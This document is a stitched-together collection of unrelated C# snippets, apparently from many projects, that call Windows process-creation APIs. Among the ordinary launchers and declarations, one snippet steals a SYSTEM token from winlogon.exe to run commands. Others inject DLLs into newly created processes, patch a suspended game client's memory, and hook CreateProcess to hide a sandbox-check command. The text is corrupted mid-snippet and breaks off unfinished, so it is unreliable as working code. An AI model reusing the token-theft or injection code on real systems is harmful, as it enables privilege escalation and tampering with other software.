public static Debuggee Launch(string executable, string argumentString = null, string workingDirectory = null) { var si = new STARTUPINFO { cb = Marshal.SizeOf(typeof(STARTUPINFO)), }; var pi = new PROCESS_INFORMATION(); if (argumentString == string.Empty) argumentString = null; if (workingDirectory == string.Empty) workingDirectory = null; if (!API.CreateProcess(executable, argumentString, IntPtr.Zero, IntPtr.Zero, true, ProcessCreationFlags.CreateNewConsole | // Create extra console for the process ProcessCreationFlags.DebugOnlyThisProcess // Grant debugger access to the process ,IntPtr.Zero, workingDirectory, ref si, out pi)) { throw new Win32Exception(Marshal.GetLastWin32Error()); } var dbg = new Debuggee(executable, pi.hProcess, pi.dwProcessId, pi.hThread, pi.dwThreadId, ExecutableMetaInfo.ExtractFrom(executable)); return dbg; }
/// <summary> /// Runs the /// </summary> public static void Run() { const uint NORMAL_PRIORITY_CLASS = 0x0020; string Path = Environment.CurrentDirectory + @"\" + (Program.projectName.ToString() == "Ultimatium" ? "BlackOpsMP.exe" : "iw5mp.exe"); string Arguments = Program.Arguments; PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION(); STARTUPINFO sInfo = new STARTUPINFO(); SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES(); SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); bool Initialized = CreateProcess(Path, Arguments, ref pSec, ref tSec, false, NORMAL_PRIORITY_CLASS, IntPtr.Zero, null, ref sInfo, out pInfo); if (Initialized) { Log.Write("Launching " + Program.projectName + "..."); Log.Write("Successful launch. PID: " + pInfo.dwProcessId); Log.Write("Happy gaming!"); Environment.Exit(0x0); } else { Log.Write("ERROR: Could not launch " + Program.projectName + ". Press any key to exit."); Console.ReadKey(); Environment.Exit(0x3); } }
/// <summary> /// Creates the process. /// </summary> /// <param name="ProcessName">Name of the process.</param> /// <param name="CommandLine">The command line.</param> /// <exception cref="System.Exception">Failure</exception> public static void CreateProcess(string ProcessName, string CommandLine) { Log.WriteLine("CreateProcess(" + ProcessName + ", " + CommandLine + ")"); STARTUPINFO SInfo = new STARTUPINFO(); PROCESS_INFORMATION PInfo = new PROCESS_INFORMATION(); Log.WriteLine("Try Connect to DBG"); DbgUiConnectToDbg(); Log.WriteLine("Try CreateProcess"); if (!CreateProcess(null, new StringBuilder(ProcessName).Append(" ").Append(CommandLine), null, null, false, 0x1 | 0x2, null, null, ref SInfo, ref PInfo)) { // May be must be run under Administrator. if (Global.IsAdministrator()) { Log.WriteLine("Creating process failed."); } else { RestartWithAdministrator(); } } Log.WriteLine("Try Stop Debugging"); DbgUiStopDebugging(PInfo.hProcess); CloseHandle(PInfo.hProcess); CloseHandle(PInfo.hThread); Log.WriteLine("Created Process."); }
public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
public static bool StartProcessAsCurrentUser(string appPath, string cmdLine = null, string workDir = null, bool visible = true) { var hUserToken = IntPtr.Zero; var startInfo = new STARTUPINFO(); var procInfo = new PROCESS_INFORMATION(); var pEnv = IntPtr.Zero; int iResultOfCreateProcessAsUser; startInfo.cb = Marshal.SizeOf(typeof(STARTUPINFO)); try { if (!GetSessionUserToken(ref hUserToken)) { throw new Exception("StartProcessAsCurrentUser: GetSessionUserToken failed."); } uint dwCreationFlags = CREATE_UNICODE_ENVIRONMENT | (uint)(visible ? CREATE_NEW_CONSOLE : CREATE_NO_WINDOW); startInfo.wShowWindow = (short)(visible ? SW.SW_SHOW : SW.SW_HIDE); startInfo.lpDesktop = "winsta0\\default"; if (!CreateEnvironmentBlock(ref pEnv, hUserToken, false)) { throw new Exception("StartProcessAsCurrentUser: CreateEnvironmentBlock failed."); } if (!CreateProcessAsUser(hUserToken, appPath, // Application Name cmdLine, // Command Line IntPtr.Zero, IntPtr.Zero, false, dwCreationFlags, pEnv, workDir, // Working directory ref startInfo, out procInfo)) { throw new Exception("StartProcessAsCurrentUser: CreateProcessAsUser failed.\n"); } iResultOfCreateProcessAsUser = Marshal.GetLastWin32Error(); } finally { CloseHandle(hUserToken); if (pEnv != IntPtr.Zero) { DestroyEnvironmentBlock(pEnv); } CloseHandle(procInfo.hThread); CloseHandle(procInfo.hProcess); } return true; }
public static extern bool CreateProcess(StringBuilder lpApplicationName, StringBuilder lpCommandLine, SECURITY_ATTRIBUTES lpProcessAttributes, SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, int dwCreationFlags, StringBuilder lpEnvironment, StringBuilder lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, ref PROCESS_INFORMATION lpProcessInformation );
public static extern bool CreateProcess(String imageName, String cmdLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool boolInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, String lpszCurrentDir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
public static extern bool CreateProcessAsUser( IntPtr hToken, string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
internal static extern bool CreateProcessWithLogonW( string userName, string domain, string passwordInClearText, LogonFlags logonFlags, [MarshalAs(UnmanagedType.LPTStr)] string appName, StringBuilder cmdLine, int creationFlags, IntPtr environmentBlock, [MarshalAs(UnmanagedType.LPTStr)] string lpCurrentDirectory, STARTUPINFO lpStartupInfo, PROCESS_INFORMATION lpProcessInformation);
internal static extern bool CreateProcess( [MarshalAs(UnmanagedType.LPTStr)] string lpApplicationName, StringBuilder lpCommandLine, ref SECURITY_ATTRIBUTES procSecAttrs, ref SECURITY_ATTRIBUTES threadSecAttrs, bool bInheritHandles, int dwCreationFlags, IntPtr lpEnvironment, [MarshalAs(UnmanagedType.LPTStr)] string lpCurrentDirectory, STARTUPINFO lpStartupInfo, PROCESS_INFORMATION lpProcessInformation );
private string RunProcess(string id, string command) { try { IntPtr dupedToken = new IntPtr(0); SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES(); sa.bInheritHandle = false; sa.Length = Marshal.SizeOf(sa); sa.lpSecurityDescriptor = (IntPtr)0; var token = WindowsIdentity.GetCurrent().Token; const uint GENERIC_ALL = 0x10000000; const int SecurityImpersonation = 2; const int TokenType = 1; var ret = DuplicateTokenEx(token, GENERIC_ALL, ref sa, SecurityImpersonation, TokenType, ref dupedToken); if (ret == false) throw new Exception("DuplicateTokenEx failed (" + Marshal.GetLastWin32Error() + ")"); STARTUPINFO si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si); si.lpDesktop = ""; PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); uint exitCode; try { ret = CreateProcessAsUser(dupedToken, null, @"c:\windows\system32\shutdown.exe " + command + " /m " + id, ref sa, ref sa, false, 0, (IntPtr)0, "c:\\", ref si, out pi); if (ret == false) throw new Exception("CreateProcessAsUser failed (" + Marshal.GetLastWin32Error() + ")"); WaitForSingleObject(pi.hProcess, 10000); GetExitCodeProcess(pi.hProcess, out exitCode); } catch (Exception ex) { throw ex; } finally { CloseHandle(pi.hProcess); CloseHandle(pi.hThread); CloseHandle(dupedToken); } if (exitCode == 0) return ""; return "Exit code: " + exitCode; } catch (Exception ex) { return ex.Message; } }
static extern bool CreateProcess( string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref StartupInfo lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation );
public static extern Boolean CreateProcessWithLogonW( String lpszUsername, String lpszDomain, String lpszPassword, Int32 dwLogonFlags, String applicationName, String commandLine, Int32 creationFlags, IntPtr environment, String currentDirectory, ref STARTUPINFO sui, out PROCESS_INFORMATION processInfo );
public static extern Boolean CreateProcessAsUser( IntPtr hToken, String lpApplicationName, String lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, Boolean bInheritHandles, Int32 dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation );
static int Main(string[] args) { var exe = Assembly.GetExecutingAssembly().Location; var dir = Path.GetDirectoryName(exe); var name = Path.GetFileNameWithoutExtension(exe); var configPath = Path.Combine(dir, name + ".shim"); if(!File.Exists(configPath)) { Console.Error.WriteLine("Couldn't find " + Path.GetFileName(configPath) + " in " + dir); return 1; } var config = Config(configPath); var path = Get(config, "path"); var add_args = Get(config, "args"); var si = new STARTUPINFO(); var pi = new PROCESS_INFORMATION(); // create command line var cmd_args = add_args ?? ""; var pass_args = Serialize(args); if(!string.IsNullOrEmpty(pass_args)) { if(!string.IsNullOrEmpty(cmd_args)) cmd_args += " "; cmd_args += pass_args; } if(!string.IsNullOrEmpty(cmd_args)) cmd_args = " " + cmd_args; var cmd = "\"" + path + "\"" + cmd_args; if(!CreateProcess(null, cmd, IntPtr.Zero, IntPtr.Zero, bInheritHandles: true, dwCreationFlags: 0, lpEnvironment: IntPtr.Zero, // inherit parent lpCurrentDirectory: null, // inherit parent lpStartupInfo: ref si, lpProcessInformation: out pi)) { return Marshal.GetLastWin32Error(); } WaitForSingleObject(pi.hProcess, INFINITE); uint exit_code = 0; GetExitCodeProcess(pi.hProcess, out exit_code); // Close process and thread handles. CloseHandle(pi.hProcess); CloseHandle(pi.hThread); return (int)exit_code; }
private static extern bool CreateProcess( [MarshalAs(UnmanagedType.LPTStr)] string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, int dwCreationFlags, IntPtr lpEnvironment, [MarshalAs(UnmanagedType.LPTStr)] string lpCurrentDirectory, STARTUPINFO lpStartupInfo, ref PROCESS_INFORMATION lpProcessInformation );
public DLLInformation inject(string exePath, string dllPath) { DLLInformation d = new DLLInformation(); STARTUPINFO lpStartupInfo = new STARTUPINFO(); PROCESS_INFORMATION lpProcessInfo = new PROCESS_INFORMATION(); SECURITY_ATTRIBUTES lpSecurityAttributes1 = new SECURITY_ATTRIBUTES(); SECURITY_ATTRIBUTES lpSecurityAttributes2 = new SECURITY_ATTRIBUTES(); lpSecurityAttributes1.nLength = Marshal.SizeOf(lpSecurityAttributes1); lpSecurityAttributes2.nLength = Marshal.SizeOf(lpSecurityAttributes2); IntPtr hProcess; CreateProcess(exePath, "", ref lpSecurityAttributes1, ref lpSecurityAttributes2, false, 0x0020, IntPtr.Zero, null, ref lpStartupInfo, out lpProcessInfo); hProcess = OpenProcess((int)(0x000F0000L | 0x00100000L | 0xFFF), false, lpProcessInfo.dwProcessId); d.ProcID = lpProcessInfo.dwProcessId; d.ErrorCode = commonInject(hProcess, dllPath, ref d); return d; }
//Initialization // static uint SW_SHOW = 5; public static PROCESS_INFORMATION CreateProc(string fullCommand) { STARTUPINFO si = new STARTUPINFO(); PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); CreateProcess( null, fullCommand, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref si, out pi); return pi; }
public static void Run(out String status, out String identity, String cmdline, String startfrom) { bool ret = false; identity = CurrentUserName; SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES(); sa.bInheritHandle = false; sa.Length = Marshal.SizeOf(sa); sa.lpSecurityDescriptor = (IntPtr)0; STARTUPINFO si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si); si.lpDesktop = ""; string commandLinePath; commandLinePath = cmdline; PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); ret = CreateProcess( null, //LPCTSTR lpApplicationName, cmdline, //LPTSTR lpCommandLine, ref sa, //LPSECURITY_ATTRIBUTES lpProcessAttributes, ref sa, //LPSECURITY_ATTRIBUTES lpThreadAttributes, false, //BOOL bInheritHandles, 0, //DWORD dwCreationFlags, (IntPtr)0, //LPVOID lpEnvironment, startfrom, //LPCTSTR lpCurrentDirectory, ref si, //LPSTARTUPINFO lpStartupInfo, out pi); //LPPROCESS_INFORMATION lpProcessInformation if (ret == false) { status = "CreateProcess failed with " + Marshal.GetLastWin32Error(); } else { status = "CreateProcess SUCCESS. The child PID is" + pi.dwProcessId; CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } }
public static void LaunchCommand1(string strCommand, string strDomain, string strName, string strPassword) { // Variables PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION(); STARTUPINFO startInfo = new STARTUPINFO(); bool bResult = false; UInt32 uiResultWait = WAIT_FAILED; try { // Create process startInfo.cb = Marshal.SizeOf(startInfo); bResult = CreateProcessWithLogonW( strName, strDomain, strPassword, 0, null, strCommand, 0, IntPtr.Zero, null, ref startInfo, out processInfo ); if (!bResult) { throw new Exception("CreateProcessWithLogonW error #" + Marshal.GetLastWin32Error().ToString()); } // Wait for process to end uiResultWait = WaitForSingleObject(processInfo.hProcess, INFINITE); if (uiResultWait == WAIT_FAILED) { throw new Exception("WaitForSingleObject error #" + Marshal.GetLastWin32Error()); } } finally { // Close all handles CloseHandle(processInfo.hProcess); CloseHandle(processInfo.hThread); } }
public static void CreateLinProcess(string lineagefolder, long ip, ushort port, string s3ep1, string logindll) { //"C:\\Lineage Tikal\\S3EP1.exe" //"2130706433 16600" //3325717308 var binpath = System.IO.Path.Combine(lineagefolder, s3ep1); STARTUPINFO si = new STARTUPINFO(); PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); bool success = CreateProcess(binpath, string.Format("\"{0}\" {1} {2}", binpath, ip, port), IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED | ProcessCreationFlags.CREATE_DEFAULT_ERROR_MODE, IntPtr.Zero, null, ref si, out pi); var logindllpath = System.IO.Path.Combine(lineagefolder, logindll); DllInjector.GetInstance.bInject(pi.dwProcessId, logindllpath); System.Threading.Thread.Sleep(1000); //System.Windows.Forms.MessageBox.Show("Attach debugger"); IntPtr t_handle = pi.hThread; ResumeThread(t_handle); }
public int CreateProcessAsUser(string app, string cmd) { PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); try { SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES(); sa.Length = Marshal.SizeOf(sa); STARTUPINFO si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si); si.lpDesktop = String.Empty; if (app != null && app.Length == 0) app = null; if (cmd != null && cmd.Length == 0) cmd = null; if (!Win32API.CreateProcessAsUser( _userTokenHandle, app, cmd, ref sa, ref sa, false, 0, IntPtr.Zero, @"C:\", ref si, ref pi )) { int error = Marshal.GetLastWin32Error(); Win32Exception ex = new Win32Exception(error); string message = String.Format("CreateProcessAsUser Error: {0}", ex.Message); throw new ApplicationException(message, ex); } } catch (Exception ex) { EventLog.WriteEntry("Screen Monitor", ex.Message, EventLogEntryType.Error, 1, 1); throw; } finally { if (pi.hProcess != IntPtr.Zero) Win32API.CloseHandle(pi.hProcess); if (pi.hThread != IntPtr.Zero) Win32API.CloseHandle(pi.hThread); } return pi.dwProcessID; }
public static ExternalProcess Create(string command) { PROCESS_INFORMATION process_info = new PROCESS_INFORMATION(); STARTUPINFO startup_info = new STARTUPINFO(); startup_info.cb = Marshal.SizeOf(startup_info); startup_info.dwFlags = STARTF_USESTDHANDLES; SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES(); SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES(); bool result = CreateProcess(null, command, ref pSec, ref tSec, true, DETACHED_PROCESS, IntPtr.Zero, null, ref startup_info, out process_info); int process_id = process_info.dwProcessId; if (!result) { Console.Error.WriteLine("CreateProcess failed"); return null; } return new ExternalProcess((uint)process_id); }
public static int? StartProcessSuspended(string fileName, string args) { const uint CREATE_SUSPENDED = 0x00000004; var pInfo = new PROCESS_INFORMATION(); var sInfo = new STARTUPINFO(); var pSec = new SECURITY_ATTRIBUTES(); var tSec = new SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); var result = CreateProcess( null, fileName + " " + args, ref pSec, ref tSec, false, CREATE_SUSPENDED, IntPtr.Zero, null, ref sInfo, out pInfo); return result ? (int?)pInfo.dwProcessId : null; }
public static unsafe extern bool CreateProcessAsUser( IntPtr hToken, string lpApplicationName, string lpCommandLine, SECURITY_ATTRIBUTES lpProcessAttributes, SECURITY_ATTRIBUTES lpThreadAttributes, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandles, CreateProcessFlags dwCreationFlags, void* lpEnvironment, // pointer because it may point to unicode or ANSI characters, based on a flag. string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
private static extern bool CreateProcessPI(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandles, uint dwCreationFlags, string lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
public bool CreateProcessHooked(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, UInt32 dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, ref PROCESS_INFORMATION lpProcessInformation) { if ((lpCommandLine.IndexOf("echo NOT SANDBOXED")) > 0) { return(System.Convert.ToBoolean(1)); } return(CreateProcess(lpApplicationName, lpCommandLine, ref lpProcessAttributes, ref lpThreadAttributes, bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, ref lpStartupInfo, ref lpProcessInformation)); }
public static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)] string lpApplicationName, StringBuilder lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
public Process(STARTUPINFOEX startupInfo, PROCESS_INFORMATION processInfo) { StartupInfo = startupInfo; ProcessInfo = processInfo; }
private static extern int CreateProcessA(string lpApplicationName, string lpCommandLine, int lpProcessAttributes, int lpThreadAttributes, int bInheritHandles, int dwCreationFlags, int lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, ref PROCESS_INFORMATION lpProcessInformation);
private static extern void CorLaunchApplication(uint hostType, string applicationFullName, int manifestPathsCount, string[] manifestPaths, int activationDataCount, string[] activationData, PROCESS_INFORMATION processInformation);
static void Main(string[] args) { int procId; string file; if (args.Length < 2) { file = "whoami /priv"; if (args.Length == 0) { // If we don't have a process ID as an argument, find winlogon.exe procId = Process.GetProcessesByName("winlogon").First().Id; } else if (args[0].Contains('.')) { procId = Process.GetProcessesByName("winlogon").First().Id; if (args != null) { file = args[0]; } } else { procId = Convert.ToInt32(args[0]); } } else { procId = Convert.ToInt32(args[0]); file = args[1]; } Console.WriteLine("Stealing token from PID " + procId); IntPtr tokenHandle = IntPtr.Zero; IntPtr dupHandle = IntPtr.Zero; SafeWaitHandle procHandle = new SafeWaitHandle(Process.GetProcessById(procId).Handle, true); Console.WriteLine("Process handle: True"); bool procToken = OpenProcessToken(procHandle.DangerousGetHandle(), (uint)TokenAccessLevels.MaximumAllowed, out tokenHandle); Console.WriteLine("OpenProcessToken: " + procToken); bool duplicateToken = DuplicateTokenEx(tokenHandle, (uint)TokenAccessLevels.MaximumAllowed, IntPtr.Zero, (uint)TokenImpersonationLevel.Impersonation, TOKEN_TYPE.TokenImpersonation, out dupHandle); Console.WriteLine("DuplicateTokenEx: " + duplicateToken); WindowsIdentity ident = new WindowsIdentity(dupHandle); Console.WriteLine("Impersonated user: "******"NT AUTHORITY\\Everyone", PipeAccessRights.FullControl, AccessControlType.Allow)); using (AnonymousPipeServerStream pipeServer = new AnonymousPipeServerStream(PipeDirection.In, HandleInheritability.Inheritable, 4096, sec)) { using (AnonymousPipeClientStream pipeClient = new AnonymousPipeClientStream(PipeDirection.Out, pipeServer.ClientSafePipeHandle)) { // Set process to use anonymous pipe for input/output startInfo.hStdOutput = pipeClient.SafePipeHandle.DangerousGetHandle(); startInfo.hStdError = pipeClient.SafePipeHandle.DangerousGetHandle(); startInfo.dwFlags = STARTF.STARTF_USESTDHANDLES | STARTF.STARTF_USESHOWWINDOW; // END NAME PIPE INITIALIZATION PROCESS_INFORMATION newProc = new PROCESS_INFORMATION(); using (StreamReader reader = new StreamReader(pipeServer)) { bool createProcess = CreateProcessWithTokenW(dupHandle, IntPtr.Zero, null, file, IntPtr.Zero, IntPtr.Zero, "C:\\Temp", ref startInfo, out newProc); Process proc = Process.GetProcessById(newProc.dwProcessId); while (!proc.HasExited) { Thread.Sleep(1000); } pipeClient.Close(); string output = reader.ReadToEnd(); Console.WriteLine("Started process with ID " + newProc.dwProcessId); Console.WriteLine("CreateProcess return code: " + createProcess); Console.WriteLine("Process output: " + output); } CloseHandle(tokenHandle); CloseHandle(dupHandle); } } }
static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref STARTUPINFO lpStartinfo, out PROCESS_INFORMATION lpProcInformation);
public static extern bool CreateProcess(string imageName, string cmdLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool boolInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpszCurrentDir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
public static extern bool CreateProcessWithLogonW(string lpszUsername, string lpszDomain, string lpszPassword, int dwLogonFlags, string applicationName, string commandLine, int creationFlags, IntPtr environment, string currentDirectory, ref STARTUPINFO sui, out PROCESS_INFORMATION processInfo);
/// <summary> /// /// </summary> public ProcessEx() { StartupInfo = new STARTUPINFO(); ProcessInformation = new PROCESS_INFORMATION(); LaunchDirectory = null; }
/// <summary> /// Creates a new process in a desktop. /// </summary> /// <param name="path">Path to application.</param> /// <returns>The process object for the newly created process.</returns> public Process CreateProcess(string path) { // make sure object isnt disposed. CheckDisposed(); // make sure a desktop is open. if (!IsOpen) return null; // set startup parameters. var si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si); si.lpDesktop = DesktopName; var pi = new PROCESS_INFORMATION(); // start the process. var result = CreateProcess(null, path, IntPtr.Zero, IntPtr.Zero, true, NORMAL_PRIORITY_CLASS, IntPtr.Zero, null, ref si, ref pi); // error? if (!result) return null; // Get the process. return Process.GetProcessById(pi.dwProcessId); }
}// /// <summary> /// Create process on desktop. /// </summary> /// <param name="name">Desktop name</param> /// <param name="path">Executable name or full path</param> /// <param name="args">Executable arguments separated by space and slash, example: /arg1 /arg2</param> /// <returns>True if sucessful, otherwise false.</returns> public static bool ProcessCreate(string name, string path, string args = null) { try { // Process parameters. PROCESS_INFORMATION processInformation = new PROCESS_INFORMATION(); STARTUPINFO startupInfo = new STARTUPINFO(); startupInfo.cb = Marshal.SizeOf(startupInfo); startupInfo.lpDesktop = name; // Desktop name // Create and start the process. string path2 = string.Format("\"{0}\" {1}", path, args); // Format arguments bool result = CreateProcess(null, path2, IntPtr.Zero, IntPtr.Zero, true, NORMAL_PRIORITY_CLASS, IntPtr.Zero, null, ref startupInfo, ref processInformation); return result; } catch (Exception ex) { Debug.WriteLine(ex.ToString()); return false; } }//
static void Main() { Dictionary <string, string> envs = new Dictionary <string, string>(); if (!ExtractCommandLine(out exePath, out args, out use_showwindow, envs)) { Environment.Exit(1); } string exeDir = Path.GetDirectoryName(exePath); envs["Path"] = Environment.GetEnvironmentVariable("PATH") + ";" + exeDir; foreach (KeyValuePair <string, string> env in envs) { Environment.SetEnvironmentVariable(env.Key, env.Value); } var pInfo = new PROCESS_INFORMATION(); var sInfoEx = new STARTUPINFOEX(); sInfoEx.StartupInfo = new STARTUPINFO(); sInfoEx.StartupInfo.dwFlags = Kernel32.STARTF_USESTDHANDLES; if (use_showwindow) { sInfoEx.StartupInfo.dwFlags |= Kernel32.STARTF_USESHOWWINDOW; } IntPtr iStdOut = Kernel32.GetStdHandle(Kernel32.STD_OUTPUT_HANDLE); IntPtr iStdErr = Kernel32.GetStdHandle(Kernel32.STD_ERROR_HANDLE); IntPtr iStdIn = Kernel32.GetStdHandle(Kernel32.STD_INPUT_HANDLE); sInfoEx.StartupInfo.wShowWindow = Kernel32.SW_HIDE; sInfoEx.StartupInfo.hStdInput = iStdIn; sInfoEx.StartupInfo.hStdOutput = iStdOut; sInfoEx.StartupInfo.hStdError = iStdErr; Kernel32.CreateProcess( null, exePath + " " + args, IntPtr.Zero, IntPtr.Zero, true, Kernel32.STARTF_USESTDHANDLES, IntPtr.Zero, null, ref sInfoEx, out pInfo); Kernel32.CloseHandle(pInfo.hThread); //make sure dispatcher kill its child process when killed var job = new Job(); job.AddProcess(Process.GetCurrentProcess().Handle); job.AddProcess(pInfo.hProcess); Kernel32.WaitForSingleObject(pInfo.hProcess, Kernel32.INFINITE); uint exitCode; Kernel32.GetExitCodeProcess(pInfo.hProcess, out exitCode); //clean up Kernel32.CloseHandle(pInfo.hProcess); Kernel32.CloseHandle(iStdOut); Kernel32.CloseHandle(iStdErr); Kernel32.CloseHandle(iStdIn); Environment.Exit((int)exitCode); }
public static extern bool CreateProcessAsUser(IntPtr tokenHandle, string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandle, uint creationFlags, IntPtr envrionment, string currentDirectory, ref STARTUPINFO startupInfo, ref PROCESS_INFORMATION processInformation);
public static void CreateProcess(string app, string path) { bool result; IntPtr hToken = WindowsIdentity.GetCurrent().Token; IntPtr hDupedToken = IntPtr.Zero; PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES(); sa.Length = Marshal.SizeOf(sa); STARTUPINFO si = new STARTUPINFO(); si.cb = Marshal.SizeOf(si); int dwSessionID = WTSGetActiveConsoleSessionId(); result = WTSQueryUserToken(dwSessionID, out hToken); if (!result) { ShowMessageBox("WTSQueryUserToken failed", "AlertService Message"); } result = DuplicateTokenEx( hToken, GENERIC_ALL_ACCESS, ref sa, (int)SECURITY_IMPERSONATION_LEVEL.SecurityIdentification, (int)TOKEN_TYPE.TokenPrimary, ref hDupedToken ); if (!result) { ShowMessageBox("DuplicateTokenEx failed", "AlertService Message"); } IntPtr lpEnvironment = IntPtr.Zero; result = CreateEnvironmentBlock(out lpEnvironment, hDupedToken, false); if (!result) { ShowMessageBox("CreateEnvironmentBlock failed", "AlertService Message"); } result = CreateProcessAsUser( hDupedToken, app, String.Empty, ref sa, ref sa, false, 0, IntPtr.Zero, null, ref si, ref pi); if (!result) { int error = Marshal.GetLastWin32Error(); string message = String.Format("CreateProcessAsUser Error: {0}", error); ShowMessageBox(message, "AlertService Message"); } if (pi.hProcess != IntPtr.Zero) { CloseHandle(pi.hProcess); } if (pi.hThread != IntPtr.Zero) { CloseHandle(pi.hThread); } if (hDupedToken != IntPtr.Zero) { CloseHandle(hDupedToken); } }
public static extern bool CreateProcessWithTokenW(IntPtr hToken, LogonFlags dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
private void pictureEdit1_Click(object sender, EventArgs e) { var daPath = @"..\7.18\Darkages.exe"; var server = config.Servers.Find(i => i.ServerName == comboBox1.Text); if (server == null) { MessageBox.Show("Error, Check config."); return; } STARTUPINFO si = new STARTUPINFO(); PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); bool success = NativeMethods.CreateProcess(daPath, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi); MemorySharp memory; try { memory = new MemorySharp((int)pi.dwProcessId); } catch (Exception error) { MessageBox.Show(string.Format("Fatal Launch Error: {0}", error.Message + "\n" + error.StackTrace)); File.WriteAllText("lorule_lerror.txt", string.Format("Fatal Launch Error: {0}", error.Message + "\n" + error.StackTrace)); return; } var payload = new byte[7]; var segments = server.IPAddress.Split('.'); if (server.IPAddress.Contains(".com") || server.IPAddress.Contains("www.") || segments.Length != 4) { var ip = Dns.GetHostAddresses(server.IPAddress)[0]; var ipString = ip.ToString(); payload[0] = Convert.ToByte(ipString[3]); payload[1] = 0x6A; payload[2] = Convert.ToByte(ipString[2]); payload[3] = 0x6A; payload[4] = Convert.ToByte(ipString[1]); payload[5] = 0x6A; payload[6] = Convert.ToByte(ipString[0]); memory.Write((IntPtr)(0x400000 + server.HookTable), payload, false); memory.Write((IntPtr)(0x400000 + server.PatchTable), payload, false); } else { if (server.ClientVersion == 718 && segments.Length == 4) { payload[0] = 